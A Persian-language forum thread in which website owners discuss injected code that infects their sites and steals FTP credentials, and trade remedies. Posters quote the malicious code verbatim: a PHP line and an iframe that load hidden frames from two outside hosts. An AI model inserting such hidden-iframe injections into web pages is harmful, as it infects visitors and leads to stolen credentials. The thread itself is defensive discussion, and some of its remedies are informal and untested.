سلام
دوستان جدیدا اطلاع دارید که هک های
<?php
echo "<iframe src=\"http://brugeni.net/?click=5F7A23\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
در حال حاضر زیاد شده کسی راهی برای جلوگیری از این بلده ؟
-----------

میشه یه توضیحی بدید؟

این همون کدی هستش که به کدهای سایت ها افزوده میشه.
موتور جستجوی گوگل و خیلی از مرورگرها سایتی که اینجور کدها در اون باشه رو مخرب تشخیص میده و حتی تا جایی پیش میره که گوگل سایت رو به بلک لیست میبره.
هنوز کسی نمیدونه اینجور اسکریپت ها چگونه وارد کدها میشوند و من هم هنوز چیزی نشنیدم.

نکته جالب اینجاست که من چند روز پیش یه کد جاوا اسکریپت هم دیدم که بصورت جالبی به اسکریپت ها افزوده شده بود. اخطاری مرورگر نمیداد ولی سرعت لود سایت رو خیلی پایین می آورد.

تا یادم نرفته این رو هم بگم که یکسری از این کدها خودشون رو در تمام فایل های index کپی میکنن.

آره دقیق همین هم هست فقط کافی هست یه فایل اینجوری بشه !!
3 سوت تمام اندکس ها رو خراب می کنه !!
می خوام ببینم کسی جلوگیری از این رو می دونه !!
سرعت لود سایت رو خیلی میاره پایین چون مخفیانه فایلی رو روی سیستم شما نصب می کنه !
و از اون به بعد طبق مطالعه که من در یک سایت داشتم الان لینک اون یادم نیست
نوشته بود که صفحات وب رو آلوده می کنه و تمام یوزر نیم و پسورد های نرم افزار های CuteFTP ، LeapFTP و از این جور نرم افزار ها که با FTP کار می کنند رو برای نویسنده این ویروس ارسال می کنه و اگر بیننده ای سایت آلوده رو مشاهده کنه این اتفاق هم برای اون شخص می افته !
تازه چون این ویروس کد ویروس رو به صفحه وارد نمی کنه و فقط آدرس فایل رو وارد می کنه به این علت ویروس کش های سیستم های سرور قادر به شناسایی اونها نیستند !!
مگر اینکه اون فایل داخل خوده سرور اجرا بشه !!
حالا دوستان اگر تجربه ای دراین زمینه دارن خوشحال می شم مطرح کنند

هعمون موقع که من با این مشکل مواجه شدم ، گفتند که مشکل از آپدیت نبودن php و apache هستش.
البته هاست متعلق به من نبود و بعد از آپدیت دیگه چنین مشکلی مشاهده نشد.

در حال حاضر
Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 Server at sodahost.net Port 80
---------
فکر نکنم نسخه جدید تری از PHP و apache اومده باشه !!

جالبه من هم به همچنین موردی برخوردم.
روز اول 2 تل از وب سایت ها و الان فقط www.uefa.ir آلوده شده.
هر روز دستی سریع فایلها رو جایگزین می کنم.

<iframe src="http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10" width=197 height=0 style="visibility: hidden"></iframe>

هنوز هم راه حل مناسبی پیدا نکردم.

من فکر میکنم این یک ویروسه که از سیستم به داخل سایت ها میره...و از سایت به سیستم, !
باید دستی پاک کنید و یک ویندوزی عوض کنید...من یکبار چنین مشکلی داشتم.بعد از انجام این کار ها دیگه این مشکل رو نداشتم...

بعد از پاک کردن این خط از سایتتون, بعد از دو سه روز گوگل بازش میکنه...

با سلام
-----------
بله قبلا در Index اصلی سایت من این کد را قرار داده بودند (دانلود رایگان نرم افزار) و بعد من سریعا فهمیدم و پاکش کردم !
و گر نه... :d

این فایل یه نوع برنامه خرب هست که از روی سیستم شما وارد سرور می شه ، و می تونه یوزر و پسورد اف تی پی رو ارسال کنه ...

این فایل یه نوع برنامه خرب هست که از روی سیستم شما وارد سرور می شه ، و می تونه یوزر و پسورد اف تی پی رو ارسال کنه ...

Irrelevant, please someone delete my post

امروز این مطلب رو نوشتم. مشکل شما رو حل میکنه
http://www.fahomag.com/index.php/articles/48-serveradminstips/307-gumblar-attack

بهتره از یه هکر کمک بگیرین.

من هم این مشکل رو داشتم،

شما میتونید با تغییر پسورد تمامی FTP های سرورتون این مشکل رو حل کنید.
در ضمن سیستم شما آلوده است و حتما" Win عوض کنید.

کریمی
manager@uefa.ir

باسلام
------------
اگه از اول یک سرور ترو تمیز با آنتی ویروس و آنتی روت کیت و این مسائل داشتند و آپدیت هم میشد فکر نکنم این مشکلات پیش میومد ! یک ویندوز اصل و کسپرسکی اصل بخرید و SpywareTerminator هم که رایگان نصب کنید دیگه راحت باشید !

من قبلا یک ویروس گرفته بودم که تقریبا شبیه این بود و اون موقع هنوز مد نشده بود .

دوست گلم که ویروس نویس هست عنایت کرده بودن :)

اما توضیحی بدم برای روش انتقال شاید به دردتون بخره ویروس که من گرفته بودم از طریق ضعف اینترنت اکسپلورر و ویندوز وارد سیستم میشد و خودش رو توی فایل های html کپی میکرد . با آپدیت کردن ویندوز و اکسپلورر و همچنین پاک کردن دستی مانع شدم و فکر کنم دیگه همچین ویروسی ندارم . اصلی ترین راه انتقالش گوگل بود که بسته شد.

بهتره روی این بحث بشه که به چه نحوی روی سیستم میوفته . فکر کنم از یک اسکریپت جاوا استفاده میکنه برای همین به راحتی اجرا میشه. ( ویروس جدید ) .